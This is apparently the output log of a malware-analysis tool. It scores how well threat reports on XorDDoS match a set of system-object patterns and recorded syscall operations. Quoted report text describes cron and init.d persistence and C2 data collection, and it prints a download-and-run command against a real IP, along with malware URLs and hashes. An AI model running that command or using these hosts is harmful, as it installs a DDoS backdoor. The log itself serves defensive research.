=== mem_usage: 214.91 MB ===
asg_object: {'/etc/rc', '/perl/', '^chkconfig$', '/run/', '/var/run/', '^pipe(\\$|\\.|$)', 'permission(\\s|:)[0-9]{1,4}', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,5}$', '/etc/init.d/', 'bin/openrc', '/boot/', '^sh$', '/proc/rs_dev', '[a-zA-z]:\\d{1,5}$', 'update-rc.d', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}', '^sed$', '/boot/[a-z]{10}', '^systemctl$', '/selinux', '/etc/cron', 'bin/insserv', '/var/', '/etc/sed', 'bin/sed', '/proc/'}


Sample Xorddos-Cdnetworks.csv
	num of segment in report: 32
	lenght of ctd's OPset is 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 26. R_malObj is 0.0000
		ctd_object: set()
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 4. R_malSysObj is 0.0000
		len(asg_OPset): 73, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 73. R_malOps is 0.0000
		refered lifecycle: []
		sys_asg_OPset: [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 8. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Xorddos-Crowdstrike.csv
	num of segment in report: 45
	lenght of ctd's OPset is 0
	#R_malObj
	num of ctd objects: 0, num of asg objects: 26. R_malObj is 0.0000
		ctd_object: set()
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 4. R_malSysObj is 0.0000
		len(asg_OPset): 73, len(ctd_OPset): 0
	#R_malOps
	num of matched asg op: 0, num of asg op: 73. R_malOps is 0.0000
		refered lifecycle: []
		sys_asg_OPset: [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 8. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

Sample Xorddos-Intezer.csv
	num of segment in report: 156
	lenght of ctd's OPset is 7
	#R_malObj
	num of ctd objects: 4, num of asg objects: 26. R_malObj is 0.1538
		ctd_object: {'/etc/rc', '/proc/', '/etc/init.d/', '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'}
	#R_malSysObj
	num of ctd objects: 2, num of asg objects: 4. R_malSysObj is 0.5000
		len(asg_OPset): 73, len(ctd_OPset): 7
	#R_malOps
	num of matched asg op: 3, num of asg op: 73. R_malOps is 0.0411
		refered lifecycle: [67, 0, 68]
		sys_asg_OPset: [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 8. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP68 act=access, obj=/proc/>, <OP 6 act=extract, obj=/proc/cpuinfo, sent=table 2: data collected by the malware and sent back to the c2 server url key	description	comment hostip	ip	hardcoded to 127.0.0.1 softtype		hardcoded to “linux” pscaddr	mac address	 hostname	machine name	 hosttar	username	possibly “host target” hostos	distribution	extracted from /etc/issue or /etc/redhat-release hostcpu	clock speed	/proc/cpuinfo hostmem	amount of memory	/proc/meminfo hostpack		hardcoded to “linux” lkmtag	is rootkit enabled	 kernel	kernel version	extracted from unamefigure 12 shows the communication between redxor and the c2.>
	<OP 1 act=readlink, obj=/proc/>, <OP 6 act=extract, obj=/proc/cpuinfo, sent=table 2: data collected by the malware and sent back to the c2 server url key	description	comment hostip	ip	hardcoded to 127.0.0.1 softtype		hardcoded to “linux” pscaddr	mac address	 hostname	machine name	 hosttar	username	possibly “host target” hostos	distribution	extracted from /etc/issue or /etc/redhat-release hostcpu	clock speed	/proc/cpuinfo hostmem	amount of memory	/proc/meminfo hostpack		hardcoded to “linux” lkmtag	is rootkit enabled	 kernel	kernel version	extracted from unamefigure 12 shows the communication between redxor and the c2.>
	<OP69 act=newfstatat, obj=/proc/>, <OP 6 act=extract, obj=/proc/cpuinfo, sent=table 2: data collected by the malware and sent back to the c2 server url key	description	comment hostip	ip	hardcoded to 127.0.0.1 softtype		hardcoded to “linux” pscaddr	mac address	 hostname	machine name	 hosttar	username	possibly “host target” hostos	distribution	extracted from /etc/issue or /etc/redhat-release hostcpu	clock speed	/proc/cpuinfo hostmem	amount of memory	/proc/meminfo hostpack		hardcoded to “linux” lkmtag	is rootkit enabled	 kernel	kernel version	extracted from unamefigure 12 shows the communication between redxor and the c2.>

Sample Xorddos-Trendmicro.csv
	num of segment in report: 27
	lenght of ctd's OPset is 6
	#R_malObj
	num of ctd objects: 6, num of asg objects: 26. R_malObj is 0.2308
		ctd_object: {'/etc/rc', '/var/run/', '/etc/cron', '/var/', '[a-zA-z]:\\d{1,5}$', '/run/'}
	#R_malSysObj
	num of ctd objects: 2, num of asg objects: 4. R_malSysObj is 0.5000
		len(asg_OPset): 73, len(ctd_OPset): 6
	#R_malOps
	num of matched asg op: 9, num of asg op: 73. R_malOps is 0.1233
		refered lifecycle: [69, 55, 2, 15, 49, 57, 56, 32, 48]
		sys_asg_OPset: [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 8. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP70 act=newfstatat, obj=/run/>, <OP 6 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP56 act=lseek, obj=/run/>, <OP 6 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP 3 act=stat64, obj=/var/>, <OP 5 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP16 act=open, obj=/etc/cron>, <OP 1 act=drop, obj=/etc/cron.hourly/gcc.sh, sent= this backdoor drops the following files:  /etc/cron.hourly/gcc.sh (cron is a time-based job scheduler in unix-like computer operating systems) backdoor routine>
	<OP50 act=stat64, obj=/var/run/>, <OP 4 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP58 act=lseek, obj=/var/>, <OP 5 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP57 act=lseek, obj=/var/run/>, <OP 4 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP33 act=stat, obj=/run/>, <OP 6 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>
	<OP49 act=stat64, obj=/run/>, <OP 6 act=read, obj=/var/run/gcc.pid, sent=creates symbolic links which points to the script in /etc/init.d: /etc/rc{1-5}.d/s90{random numbers} /etc/rc.d/rc{1-5}.d/s90{random numbers} get the magic string value from the file /var/run/gcc.pid read the following from its configuration file: md5 - checksum of file denyip - open communication with an ip filename - list of filename rmfile - files to remove>

Sample Xorddos-Trendmicro2.csv
	num of segment in report: 47
	lenght of ctd's OPset is 2
	#R_malObj
	num of ctd objects: 1, num of asg objects: 26. R_malObj is 0.0385
		ctd_object: {'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'}
	#R_malSysObj
	num of ctd objects: 0, num of asg objects: 4. R_malSysObj is 0.0000
		len(asg_OPset): 73, len(ctd_OPset): 2
	#R_malOps
	num of matched asg op: 2, num of asg op: 73. R_malOps is 0.0274
		refered lifecycle: [61, 63]
		sys_asg_OPset: [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
	#R_malChangeOps
	num of matched asg op: 0, num of asg op: 8. R_malChangeOps is 0.0000
		ref-sys lifecycle: []

	hits
	<OP62 act=send, obj=ip_addr>, <OP 1 act=wget, obj=http://122.51.133.49:10086/vip, sent=afterwards, the attackers executed the following sequence of commands to all containers, infecting all of them with the xorddos malware:  wget http://122.51.133.49:10086/vip –o vip chmod 777 vip ./vip the xorddos payload (detected by trend micro as backdoor.linux.xorddos.ae) still used the xor-key it used in other recorded attacks, bb2fa36aaa9541f0, to encrypt its strings and to communicate with the command and control (c&c) server.>
	<OP64 act=_newselect, obj=ip_addr>, <OP 2 act=find, obj=http://62.171.160.189/linux_arm, sent= indicators of compromise kaiji  file name	sha 256	trend micro pattern detection 123.sh	9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8	trojan.sh.kaiji.a linux_arm	d315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56	ddos.linux.kaiji.a related urls:  http://62.171.160.189/linux_arm http://62.171.160.189/11/123.sh xorddos and other malware variants found through the same url  sha 256	trend micro pattern detection dba757c20fbc1d81566ef2877a9bfca9b3ddb84b9f04c0ca5ae668b7f40ea8c3	backdoor.linux.xorddos.ae 6c8f95b82592ac08a03bfe32e4a4dbe637d1f542eb3ab3054042cec8ec301a3c	backdoor.linux.dofloo.ab 286f774eb5b4f2f7c62d5e68f02a37b674cca7b8c861e189f1f596789322f9fe	backdoor.win32.sddos.a related url:  http://122.51.133.49:10086/vip>


OperationPair that changes system resources:
 [<OP47 act=fchmod, obj=/etc/sed>, <OP32 act=lstat, obj=/etc/rc>, <OP48 act=rename, obj=/etc/cron>, <OP18 act=write, obj=/etc/cron>, <OP46 act=fchown, obj=/etc/sed>, <OP45 act=write, obj=/etc/sed>, <OP15 act=write, obj=/etc/init.d/>, <OP22 act=write, obj=/etc/rc>]
